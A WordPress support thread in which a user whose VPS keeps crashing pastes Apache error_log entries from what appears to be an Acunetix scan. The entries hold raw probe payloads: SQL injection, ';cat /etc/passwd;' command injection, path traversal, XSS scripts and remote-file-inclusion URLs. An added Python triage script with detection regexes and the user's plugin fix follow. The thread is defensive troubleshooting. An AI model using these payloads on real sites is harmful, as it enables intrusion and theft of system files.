• Resolved NeoRicalex

    (@neoricalex)


    Hi all,

    First, of course it's not WP that takes down my VPS.

    However, I need help because I need to reboot my VPS hosted at GoDaddy 2 or 3 times each day.

    I have read my VPS error_log and I have found a sequence of logic errors that take down my VPS.

    First, IP xx.xxx.xxx makes “50.000” requests like this (example):
    [Fri Apr 11 07:42:26 2014] [warn] [client [my vps ip]] mod_fcgid: can’t apply process slot for /var/www/cgi-bin/cgi_wrapper/cgi_wrapper

    Then, I got this:

    [Sat Apr 12 16:56:00 2014] [warn] [client [my vps ip]] mod_fcgid: stderr: SomeCustomInjectedHeader:injected_by_wvs','_wp_session_
    [Sat Apr 12 16:56:00 2014] [warn] [client [my vps ip]] mod_fcgid: stderr: SomeCustomInjectedHeader:injected_by_wvs','_wp_session_expires_-1 or 20=20','_wp_session_-1 or 20=20','_wp_session_expires_
    [Sat Apr 12 16:56:00 2014] [warn] [client [my vps ip]] mod_fcgid: stderr: cat /etc/passwd','_wp_session_
    [Sat Apr 12 16:56:00 2014] [warn] [client [my vps ip]] mod_fcgid: stderr: cat /etc/passwd','_wp_session_expires_response.write(9412876*9067279)','_wp_session_response.write(9412876*9067279)','_wp_session_expires_'+response.write(9412876*9067279)+'','_wp_session_'+response.write(9412876*9067279)+'','_wp_session_expires_
    [Sat Apr 12 16:56:00 2014] [warn] [client [my vps ip]] mod_fcgid: stderr: SomeCustomInjectedHeader:injected_by_wvs','_wp_session_
    [Sat Apr 12 16:56:00 2014] [warn] [client [my vps ip]] mod_fcgid: stderr: SomeCustomInjectedHeader:injected_by_wvs','_wp_session_expires_-1' or '63'='63','_wp_session_-1' or '63'='63','_wp_session_expires_<code>cat /etc/passwd</code>','_wp_session_<code>cat /etc/passwd</code>','_wp_session_expires_-1' or '63'='0','_wp_session_-1' or '63'='0','_wp_session_expires_|cat /etc/passwd#','_wp_session_|cat /etc/passwd#','_wp_session_expires_-1" or "21"="21','_wp_session_-1" or "21"="21','_wp_session_expires_'|'ld','_wp_session_'|'ld','_wp_session_expires_../../../../../../../../../../etc/passwd','_wp_session_../../../../../../../../../../etc/passwd','_wp_session_expires_-1" or "21"="0','_wp_session_-1" or "21"="0','_wp_session_expires_"|"ld','_wp_session_"|"ld','_wp_session_expires_..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2','_wp_session_..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2','_wp_session_expires_;cat /etc/passwd;','_wp_session_;cat /etc/passwd;','_wp_session_expires_';cat /etc/passwd;'','_wp_session_';cat /etc/passwd;'','_wp_session_expires_";cat /etc/passwd;"','_wp_session_";cat 
/etc/passwd;"','_wp_session_expires_','_wp_session_','_wp_session_expires_&dir','_wp_session_&dir','_wp_session_expires_'&dir&'','_wp_session_'&dir&'','_wp_session_expires_${99738+99276}','_wp_session_${99738+99276}','_wp_session_expires_"&dir&"','_wp_session_"&dir&"','_wp_session_expires_268435455','_wp_session_268435455','_wp_session_expires_|dir','_wp_session_|dir','_wp_session_expires_'|dir','_wp_session_'|dir','_wp_session_expires_..','_wp_session_..','_wp_session_expires_http://some-inexistent-website.acu/some_inex','_wp_session_http://some-inexistent-website.acu/some_inex','_wp_session_expires_"|dir','_wp_session_"|dir','_wp_session_expires_1e309','_wp_session_1e309','_wp_session_expires_1some_inexistent_file_with_long_name%00.jpg','_wp_session_1some_inexistent_file_with_long_name%00.jpg','_wp_session_expires_'"'")','_wp_session_'"'")','_wp_session_expires_http://testasp.vulnweb.com/t/fit.txt?%00.jpg','_wp_session_http://testasp.vulnweb.com/t/fit.txt?%00.jpg','_wp_session_expires_aENmdDRPN0NOUElSWDFyT2RnYWQ2T3lVWEhnTjVXT0dO','_wp_session_aENmdDRPN0NOUElSWDFyT2RnYWQ2T3lVWEhnTjVXT0dO','_wp_session_expires_)','_wp_session_)','_wp_session_expires_!(()&&!|*|*|','_wp_session_!(()&&!|*|*|','_wp_session_expires_'"()','_wp_session_'"()','_wp_session_expires_^(#$!@#$)(()))******','_wp_session_^(#$!@#$)(()))******','_wp_session_expires_;print(md5(acunetix_wvs_security_test));','_wp_session_;print(md5(acunetix_wvs_security_test));','_wp_session_expires_';print(md5(acunetix_wvs_security_test));$a=','_wp_session_';print(md5(acunetix_wvs_security_test));$a=','_wp_session_expires_";print(md5(acunetix_wvs_security_test));$a=','_wp_session_";print(md5(acunetix_wvs_security_test));$a=','_wp_session_expires_${@print(md5(acunetix_wvs_security_test))}','_wp_session_${@print(md5(acunetix_wvs_security_test))}','_wp_session_expires_http://testasp.vulnweb.com/t/xss.html?%00.jp','_wp_session_http://testasp.vulnweb.com/t/xss.html?%00.jp','_wp_session_expires_))))))))))))))))))))))))))))
))))))))))))))))','_wp_session_))))))))))))))))))))))))))))))))))))))))))))','_wp_session_expires_//www.acunetix.tst','_wp_session_//www.acunetix.tst','_wp_session_expires_1'"','_wp_session_1'"','_wp_session_expires_1','_wp_session_1','_wp_session_expires_<?xml version="1.0" encoding="utf-8"?>
    [Sat Apr 12 16:56:00 2014] [warn] [client [my vps ip]] mod_fcgid: stderr: <!DO','_wp_session_<?xml version="1.0" encoding="utf-8"?>
    [Sat Apr 12 16:56:00 2014] [warn] [client [my vps ip]] mod_fcgid: stderr: <!DO','_wp_session_expires_'"','_wp_session_'"','_wp_session_expires_@@TA21D','_wp_session_@@TA21D','_wp_session_expires_JyI=','_wp_session_JyI=','_wp_session_expires_<!--','_wp_session_<!--','_wp_session_expires_'"()&%1<ScRiPt >prompt(912200)</ScRiPt>','_wp_session_'"()&%1<ScRiPt >prompt(912200)</ScRiPt>','_wp_session_expires_OTg0MDE2','_wp_session_OTg0MDE2','_wp_session_expires_Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRj','_wp_session_Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRj','_wp_session_expires_/../..//../..//../..//../..//../..//etc/pass','_wp_session_/../..//../..//../..//../..//../..//etc/pass','_wp_session_expires_.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd','_wp_session_.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd','_wp_session_expires_/etc/passwd','_wp_session_/etc/passwd','_wp_session_expires_../..//../..//../..//../..//../..//../..//..','_wp_session_../..//../..//../..//../..//../..//../..//..','_wp_session_expires_../.../.././../.../.././../.../.././../.../.','_wp_session_../.../.././../.../.././../.../.././../.../.','_wp_session_expires_file:///etc/passwd','_wp_session_file:///etc/passwd','_wp_session_expires_/../../../../../../../etc/passwd','_wp_session_/../../../../../../../etc/passwd','_wp_session_expires_../../../../../../../../../../windows/win.in','_wp_session_../../../../../../../../../../windows/win.in','_wp_session_expires_../../../../../../../../../../boot.ini','_wp_session_../../../../../../../../../../boot.ini','_wp_session_expires_1040c441aefb1d4c3de6745882bbd1bf','_wp_session_1040c441aefb1d4c3de6745882bbd1bf','_wp_session_expires_3b514dcf0b8f3d41060f98968c2e4b9f','_wp_session_3b514dcf0b8f3d41060f98968c2e4b9f','_wp_session_expires_28b58e5c7d4e9cb26bef03d4305ed1e6','_wp_session_28b58e5c7d4e9cb26bef03d4305ed1e6','_wp_session_expires_a2838510d593b03804cfb9237699f266','_wp_session_a2838510d593b03804cfb9237699f266','_wp_session_expires_9667df63f985d00d047b5f5a81782b96'
,'_wp_session_9667df63f985d00d047b5f5a81782b96','_wp_session_expires_7fc33ee8f7460b9ba5b2a55ee937fb33','_wp_session_7fc33ee8f7460b9ba5b2a55ee937fb33','_wp_session_expires_400faac9ae119b07581bc8b8dd8036f7','_wp_session_400faac9ae119b07581bc8b8dd8036f7','_wp_session_expires_3a7a96ea7e9e3ff23de3f7213efc6237','_wp_session_3a7a96ea7e9e3ff23de3f7213efc6237','_wp_session_expires_3a5f26b067230a6be869b1ef79653177','_wp_session_3a5f26b067230a6be869b1ef79653177','_wp_session_expires_55692e09b109af861ada416c98d930f1','_wp_session_55692e09b109af861ada416c98d930f1','_wp_session_expires_d158770a1dc8fdea41bf4f584dcf7c2c','_wp_session_d158770a1dc8fdea41bf4f584dcf7c2c','_wp_session_expires_980720e7e432417092c87e78913be85a','_wp_session_980720e7e432417092c87e78913be85a') feita por do_action_ref_array, call_user_func_array, wp_session_cleanup

    My question is: how can I prevent this? It's really annoying to reboot my VPS 2 or more times each day.

    Is it a bot attack? Is it a plugin problem? If it is a plugin issue, can plugins take down a VPS?

    Thanks for the possible feedback and help =)
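
A defender's triage of an error_log like the one in the post above, as an added example that is not part of the original thread: it counts mod_fcgid process-slot exhaustion per client and tags probe strings by class, including the scanner markers visible in the excerpt (`injected_by_wvs`, `acunetix_wvs_security_test`). The sample lines, the 192.0.2.x addresses, the `triage` function and the signature list are assumptions constructed for illustration.

```python
import re
from collections import Counter

# Constructed sample shaped like the excerpts in the post; 192.0.2.x are documentation IPs.
SAMPLE_LOG = """\
[Fri Apr 11 07:42:26 2014] [warn] [client 192.0.2.10] mod_fcgid: can't apply process slot for /var/www/cgi-bin/cgi_wrapper/cgi_wrapper
[Fri Apr 11 07:42:27 2014] [warn] [client 192.0.2.10] mod_fcgid: can't apply process slot for /var/www/cgi-bin/cgi_wrapper/cgi_wrapper
[Sat Apr 12 16:56:00 2014] [warn] [client 192.0.2.10] mod_fcgid: stderr: SomeCustomInjectedHeader:injected_by_wvs','_wp_session_expires_-1' or '63'='63','_wp_session_
[Sat Apr 12 16:56:00 2014] [warn] [client 192.0.2.10] mod_fcgid: stderr: ','_wp_session_expires_;cat /etc/passwd;','_wp_session_../../../../etc/passwd','_wp_session_
[Sat Apr 12 16:56:00 2014] [warn] [client 192.0.2.10] mod_fcgid: stderr: ','_wp_session_;print(md5(acunetix_wvs_security_test));','_wp_session_expires_
/etc/passwd;"','_wp_session_expires_<ScRiPt >prompt(912200)</ScRiPt>','_wp_session_
[Sat Apr 12 16:57:10 2014] [error] [client 192.0.2.44] File does not exist: /var/www/html/favicon.ico
"""

LINE_RE = re.compile(r"^\[([^\]]+)\] \[(\w+)\] \[client ([^\]]+)\] (.*)$")
SLOT_RE = re.compile(r"can['’]t apply process slot")
# Assumed, non-exhaustive signatures derived from strings seen in the posted log.
SIGNATURES = {
    "scanner_marker": re.compile(r"injected_by_wvs|acunetix_wvs_security_test|vulnweb\.com", re.I),
    "sql_injection": re.compile(r"-?\d+['\"]?\s+or\s+['\"]?\d+['\"]?\s*=\s*['\"]?\d+", re.I),
    "path_traversal": re.compile(r"(\.\.(/|%2f|\\)){2,}|/etc/passwd|boot\.ini", re.I),
    "command_injection": re.compile(r"[;|`&]\s*(cat|dir|ld)\b", re.I),
    "xss_or_code_injection": re.compile(r"<script\b|print\(md5\(", re.I),
}

def triage(log_text):
    """Return (slot_exhaustion_by_client, lines_hit_per_probe_class, scanner_clients)."""
    slots, probes, scanners = Counter(), Counter(), set()
    client = None
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            client, msg = m.group(3), m.group(4)
        elif client is None:
            continue  # unprefixed text before any recognisable entry
        else:
            msg = line  # wrapped continuation: attribute it to the previous entry's client
        if SLOT_RE.search(msg):
            slots[client] += 1
        for name, rx in SIGNATURES.items():
            if rx.search(msg):
                probes[name] += 1
                if name == "scanner_marker":
                    scanners.add(client)
    return slots, probes, scanners

if __name__ == "__main__":
    slots, probes, scanners = triage(SAMPLE_LOG)
    print(dict(slots), dict(probes), sorted(scanners))
```

A client that appears both in the slot-exhaustion counts and in the scanner set is the one to rate-limit or block upstream of PHP.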

Viewing 2 replies - 1 through 2 (of 2 total)
  • Thread Starter NeoRicalex

    (@neoricalex)

    Also, I forgot to say that I have googled for “can’t apply process slot for /var/www/cgi-bin/cgi_wrapper/cgi_wrapper” and I found that it is “normal”, so here is my fcgid.conf:

    [root@My_VPS_IP My_Login]# grep -v "#" /etc/httpd/conf.d/fcgid.conf
    
    LoadModule fcgid_module modules/mod_fcgid.so
    
    <IfModule mod_fcgid.c>
    
    <IfModule !mod_fastcgi.c>
        AddHandler fcgid-script fcg fcgi fpl
    </IfModule>
    
      FcgidIPCDir /var/run/mod_fcgid/sock
      FcgidProcessTableFile /var/run/mod_fcgid/fcgid_shm
    
      FcgidIdleTimeout 40
      FcgidProcessLifeTime 30
      FcgidMaxProcesses 20
      FcgidMaxProcessesPerClass 8
      FcgidMinProcessesPerClass 0
      FcgidConnectTimeout 30
      FcgidIOTimeout 45
      FcgidInitialEnv RAILS_ENV production
      FcgidIdleScanInterval 10
    
    </IfModule>

  • Thread Starter NeoRicalex

    (@neoricalex)

    Hi all,

    I think that I have solved my issue. I have installed a plugin called Block Bad Queries (BBQ). This plugin automatically protects WordPress against malicious URL requests, or, in other words, acts as a firewall, and so far it is working.

    Here is my thank you to the developers of this plugin.

    So … if someone one day has the same issue … Block Bad Queries (BBQ) is the solution.

    Bye all

The topic ‘WP take down my VPS’ is closed to new replies.